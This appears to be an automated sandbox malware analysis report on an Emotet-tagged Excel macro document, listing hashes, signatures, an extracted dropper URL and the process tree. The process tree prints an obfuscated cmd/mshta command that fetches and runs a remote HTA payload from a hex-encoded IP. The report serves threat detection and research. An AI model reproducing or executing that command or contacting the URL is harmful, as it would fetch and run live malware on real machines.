Overview

overview

10

Static

static

8

emotet_v6

windows10_x64

10

emotet_doc

windows10_x64

10

Analysis

  • max time kernel
    154s
  • max time network
    143s
  • platform
    windows10_x64
  • resource
    win10-en-20211208
  • submitted
    20-01-2022 07:14

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    a75d803a646fa5cfa41b0489c6de355e62319450b46d41792b4b5b3cd21a0dc3.xlsm

  • Size

    115KB

  • MD5

    d5b31c6b64e9d8301335eab74bd9962f

  • SHA1

    1d2f396131f003ad2e23201b7e2661b5dd3a788b

  • SHA256

    a75d803a646fa5cfa41b0489c6de355e62319450b46d41792b4b5b3cd21a0dc3

  • SHA512

    f4b100e44b95411bbfb8d1daccbf27dac19cd6cc32ac6341deb5aaebfadf3a12460486c89b07992577bbc030c69df4af55df48c42b36b72299248eb233fba4c1

Score
10/10

Malware Config

Extracted

Language
hta
Source
URLs
hta.dropper

http://0x5cff39c3/sec/se1.html

Signatures

  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Blocklisted process makes network request 1 IoCs
  • Checks processor information in registry 2 TTPs 3 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Enumerates system info in registry 2 TTPs 3 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious use of SetWindowsHookEx 20 IoCs
  • Suspicious use of WriteProcessMemory 6 IoCs

Processes

  • C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE
    "C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\Admin\AppData\Local\Temp\a75d803a646fa5cfa41b0489c6de355e62319450b46d41792b4b5b3cd21a0dc3.xlsm"
    1⤵
    • Checks processor information in registry
    • Enumerates system info in registry
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:3472
    • C:\Windows\splwow64.exe
      C:\Windows\splwow64.exe 12288
      2⤵
        PID:1564
      • C:\Windows\SYSTEM32\cmd.exe
        cmd /c m^sh^t^a h^tt^p^:/^/0x5cff39c3/sec/se1.html
        2⤵
        • Process spawned unexpected child process
        • Suspicious use of WriteProcessMemory
        PID:2172
        • C:\Windows\system32\mshta.exe
          mshta http://0x5cff39c3/sec/se1.html
          3⤵
          • Blocklisted process makes network request
          PID:3612

    Network

    MITRE ATT&CK Enterprise v6

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • memory/3472-115-0x00007FF969B20000-0x00007FF969B30000-memory.dmp

      Filesize

      64KB

      Download

    • memory/3472-116-0x00007FF969B20000-0x00007FF969B30000-memory.dmp

      Filesize

      64KB

      Download

    • memory/3472-117-0x00007FF969B20000-0x00007FF969B30000-memory.dmp

      Filesize

      64KB

      Download

    • memory/3472-118-0x00007FF969B20000-0x00007FF969B30000-memory.dmp

      Filesize

      64KB

      Download

    • memory/3472-121-0x00007FF969B20000-0x00007FF969B30000-memory.dmp

      Filesize

      64KB

      Download

    • memory/3472-128-0x00007FF966FD0000-0x00007FF966FE0000-memory.dmp

      Filesize

      64KB

      Download

    • memory/3472-129-0x00007FF966FD0000-0x00007FF966FE0000-memory.dmp

      Filesize

      64KB

      Download